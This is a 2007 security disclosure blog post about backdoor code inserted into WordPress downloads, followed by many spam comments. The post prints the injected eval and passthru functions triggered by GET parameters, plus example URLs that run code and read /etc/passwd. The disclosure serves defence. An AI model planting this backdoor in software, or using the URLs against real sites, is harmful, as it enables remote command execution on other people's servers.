While assessing the security of WordPress, a popular blog creation software, I have discovered that it's source code has recently been compromised by a third party in order to enable remote command execution on the machines running affected versions. The compromised files are wp-includes/feed.php and wp-includes/theme.php.
The following code has been added:
in wp-includes/feed.php
function comment_text_phpfilter($filterdata) {
eval($filterdata);
}
...
if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }
in wp-includes/theme.php
function get_theme_mcommand($mcds) {
passthru($mcds);
}
...
if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }
this would enable remote command execution on machines running compromised versions, for example
http://wordpressurl/wp-includes/feed.php?ix=phpinfo();
http://wordpressurl/wp-includes/theme.php?iz=cat /etc/passwd
I have discovered this vulnerability on Friday, March 2nd 2007 and contacted WordPress about it straight away. They reacted promptly by disabling downloads until further investigation. Later they determined that ony one of two servers has been compromised and that the two files mentioned above are the only ones changed.
It seems that the above files were changed on Feb 25th, 2007, so if you downloaded WordPress between Feb 25th, 2007 and Mar 2nd 2007 it is possible that you are running a compromised version, so be sure to check for the above code.
About Wordpress
"WordPress is a state-of-the-art semantic personal publishing platform with a focus on aesthetics, web standards, and usability. What a mouthful. WordPress is both free and priceless at the same time."
Thanks to Ryan Boren of WordPress for quick response and his feedback regarding this issue.
439 comments:
«Oldest ‹Older 401 – 439 of 439Visit CMOLDS a website development company dubai offering great expertise and skills in web and app development and design.
Mind Flow Harmony is the top teacher training facility in Rishikesh and the best yoga school for beginners. We provide 100-hour, 200-hour, and 300-hour yoga teacher training programs in Rishikesh in addition to yoga nidra and anatomy courses.
100 Hour Yoga Teacher Training In Rishikesh
200 Hour Yoga Teacher Training In Rishikesh
300 Hour Yoga Teacher Training In Rishikesh
Explore how the Pharmaceutical Industry integrates ESG principles for sustainable growth with Venus Global Technology
ESG In Pharmaceutical Industry
nice blog
web design company in faridabad
Amazing approach to safeguarding data integrity and privacy, setting new standards in cyber security companies!
Transforming PL/SQL ETL to SnapLogic magic—bridging data with seamless efficiency!
Addressing the WordPress vulnerability promptly and comprehensively is critical to safeguarding your website, its data, and your users from any type of potential harm. Proactive security measures and vigilance are always essential for maintaining a secure online presence. boat rental abu dhabi
Join Our Best Yoga Certification Course In India
Meditation Teacher Training India
Yin Yoga teacher training in Rishikesh
5 Days Yoga Retreat In Rishikesh
Purchasing an original Microsoft Office licence key protects against software piracy and ensures peak performance and dependability.
microsoft office license key
I really like your blog, the information you’ve provided on the website.
Best Cardiologist in Bhopal
Your blog consistently delivers insightful and well-researched content that truly resonates with readers. I admire the way you articulate complex ideas with clarity and depth. Your dedication to providing valuable information is evident in every post. If you're planning to travel, be sure to check out our Dubai tourist places, travel tips, and inspiring stories
We’re truly grateful for this opportunity. Your support is greatly valued and contributes significantly to our shared goals. Discover the next level of financial technology with us. Explore our innovative solutions and see how they can transform your experience. Dive deeper and unlock the potential of our latest offerings—check this about what we have in store for you.
I’m thankful for your valuable input! "sfr service client mon compte" provides a streamlined approach to managing your SFR account.
Great post! I love how you capture the essence of the destination and provide practical tips for travellers. Your insights are always helpful and make me excited to explore new places. Keep sharing your adventures
Water Activities in Dubai
Thank you for sharing this insightful post! Your perspective on the topic is both refreshing and informative. Your writing is clear and engaging, making it easy to grasp and apply. Looking forward to more of your valuable content in the future.
legoland water park Dubai
Looking for a top-rated Website Designing Company In North Delhi? Look no further than Web Solution Centre. Our expert team specializes in creating stunning websites that elevate your brand presence online. Trust us for all your web design needs in North Delhi.
Renowned as the best digital marketing company in Chennai, Cortex Media Marketing provides tailored solutions that deliver exceptional results and enhance brand presence.
Bellatrum is a game-changer in the exhibition industry! Their focus on tailoring each stand to reflect a brand’s unique identity makes all the difference. From the innovative designs to the high-quality materials and expert project management, they make the process seamless and stress-free. It's clear they understand the importance of both aesthetics and functionality, ensuring that each stand not only looks fantastic but also works efficiently for client needs. Bellatrum is a perfect partner for businesses looking to make a big impact at their next event! https://bellatrum.com/
Bellatrum takes exhibition stands to the next level! Their commitment to understanding each brand’s unique needs and translating them into standout designs is truly impressive. They go beyond aesthetics, focusing on functionality and engagement, making sure every stand serves as an effective marketing tool. With Bellatrum’s expertise, brands not only capture attention but also create lasting connections with their audience. Highly recommended for anyone serious about making an impact at their next event! Bellatrum Exhibition Stand Builder
Experience Unmatched Luxury at The White Ibis 🌟
Discover Sivasagar's premier luxury boutique hotel located on HCB Road, near Hemkosh Press. Enjoy elegant rooms, gourmet dining, and personalized service at The White Ibis, where tradition meets modern luxury. Book your unforgettable stay with us today! 🏨✨ Best Hotel in Assam sivasagar
ECSOFT, the best software development company in Chennai, delivers innovative technology solutions tailored to businesses across India and beyond. From ERP, CRM, billing software, and e-commerce platforms to mobile app development. ECSOFT empowers organizations to streamline operations and enhance customer engagement. With over 25 years of expertise and a portfolio of 5,000+ satisfied clients worldwide, we are committed to turning your vision into reality.
hgjajingfnvbnnskbnk
Thanks to sharing this information with us this information help me lot sir
Reads more : https://www.rishikulyogshalarishikesh.com/200-hour-yoga-teacher-training-rishikesh.php
Thanks to sharing this information with us this information help me lot sir
200 hour yoga ttc in rishikesh
Among the top disinfectant manufacturing companies in india, Nanz Medscience excels in providing effective and safe solutions to maintain hygiene in healthcare and daily life.
Dr. Smriti Nathani has transformed breast surgery in chennai with her state-of-the-art methods and personalized care. She's a trusted name in the industry!
Nellie Health provides compassionate Mental Health Therapy Ontario, supporting individuals through emotional challenges. Their therapists prioritize building trust and understanding, fostering a comfortable space for mental wellness and growth. PTSD Ontario
The Samadhi Yoga Ashram course offers immersive training in yoga, meditation, and holistic wellness. It focuses on traditional practices, mindfulness, and self-transformation, guided by experienced instructors. Students learn to deepen their spiritual connection, enhance physical health, and cultivate inner peace through practical teachings and daily practices
yoga school in india
200 hour yoga teacher training
300 hour yoga teacher training
Hello Connect with us visit our store and get a free 5G phones.
https://mobilebyaldine.com/
Upgrade your streetwear with the Denim Tears Hoodie from Arsenaljackets.com. A symbol of culture and style, crafted for trendsetters. Make a bold statement today.
Make a bold impact at your next trade show with our premium booth rentals! Stunning designs, hassle-free setup, and unbeatable quality—book now!"Trade show booth rental
Arogya Yoga School offers transformative Yoga Teacher Training in Rishikesh, blending traditional Hatha and Ashtanga yoga. The immersive course covers asana practice, meditation, anatomy, and philosophy, guided by experienced teachers. Perfect for aspiring yogis to deepen their practice and become certified yoga instructors.
I appreciate how you bring a fresh perspective to this topic. You’ve made me think about it in a completely new way!
Kenya Visa From Dubaii
Rishikesh, often referred to as the "Yoga Capital of the World," offers numerous 200-hour Yoga Teacher Training Courses (TTC) accredited by Yoga Alliance, USA. These programs are designed to deepen your yoga practice and equip you with the skills to teach yoga professionally. Below are details from three reputable yoga schools in Rishikesh offering 200-hour TTC programs:
I always enjoy reading your blog! You have a way of explaining things that makes even complex topics easy to understand. Keep up the amazing work!
Dubai City Tour
Excellent post! I especially liked the way you explained the key points. Looking forward to more engaging content from you.
Dubai Tours
Bella Signora is a premium Indian women's clothing brand that blends tradition with contemporary fashion.
AI chatbots, it’s easier than ever to experience the latest AI technology. Whether you have a simple question or want to learn more about artificial intelligence, you can start right now. Probeer AI Chat Try AI Chat and explore the many benefits this technology offers, at no cost and with no registration required. The future of interaction is here – and it begins with a conversation with AI.
Post a Comment